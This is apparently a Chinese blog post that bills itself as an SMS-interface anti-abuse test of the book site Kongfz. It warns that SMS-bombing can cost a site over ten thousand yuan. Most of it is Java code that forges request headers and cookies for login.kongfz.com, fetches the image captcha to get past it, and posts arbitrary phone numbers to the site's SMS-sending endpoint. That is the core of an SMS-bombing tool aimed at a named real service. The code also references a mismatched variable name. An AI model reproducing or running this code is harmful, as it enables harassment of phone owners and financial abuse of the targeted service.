短信测评系列:孔夫子旧书网短信接口安全测试,你的短信接口被攻击到底有多危险,可能瞬间损失过万,短信接口防盗刷测试
发布时间:2021-04-10 点击数:3200
安全问题不容忽视,不要亡羊补牢!
//配置请求头
public Object setHeads(CloseableHttpClient httpclient, CookieStore cookieStore, Hashtable<String, String> inheads,
LinkedHashMap<String, String> outheads, Hashtable<String, String> input) {
getCookie(cookieStore, httpclient, "https://login.kongfz.com/register/index.html", inheads, outheads);
String cookieStr = GetCookieHead.CookieHashToString(outheads);
if (cookieStr != null) {
inheads.put("Cookie", cookieStr);
}
inheads.put("Host", "login.kongfz.com");
inheads.put("Accept", "application/json, text/javascript, */*; q=0.01");
inheads.put("Origin", "https://login.kongfz.com");
inheads.put("X-Requested-With", "XMLHttpRequest");
inheads.put("Content-Type", "application/x-www-form-urlencoded; charset=UTF-8");
inheads.put("Referer", "https://login.kongfz.com/Pc/Login/iframe");
return inheads;
}
//配置请求参数
public Object setParams(CloseableHttpClient httpclient, CookieStore cookieStore, Hashtable<String, String> inheads, LinkedHashMap<String, String> outheads, Hashtable<String, String> input, String phone) {
List<BasicNameValuePair> paramList = new ArrayList<>();
paramsList.add(new BasicNameValuePair("mobile", phone));
paramsList.add(new BasicNameValuePair("captchaCode", input.get("imgCode")));
paramsList.add(new BasicNameValuePair("bizType", "2"));
return paramList;
}
//配置请求
public RetEntity reg(CloseableHttpClient httpclient, CookieStore cookieStore, Hashtable<String, String> input, String phone) {
Hashtable<String, String> inheads = new Hashtable<>();
LinkedHashMap<String, String> outheads = new LinkedHashMap<>();
String imgCode = this.getImgeCode(phone, httpclient, cookieStore, "get", imgUrl, inheads, outheads, input,
imgOutMap);
input.put("imgCode", imgCode != null ? imgCode : "");
retEntity = this.userClick(httpclient, cookieStore, "post", smsUrl, inheads, outheads, input, phone);
return retEntity;
}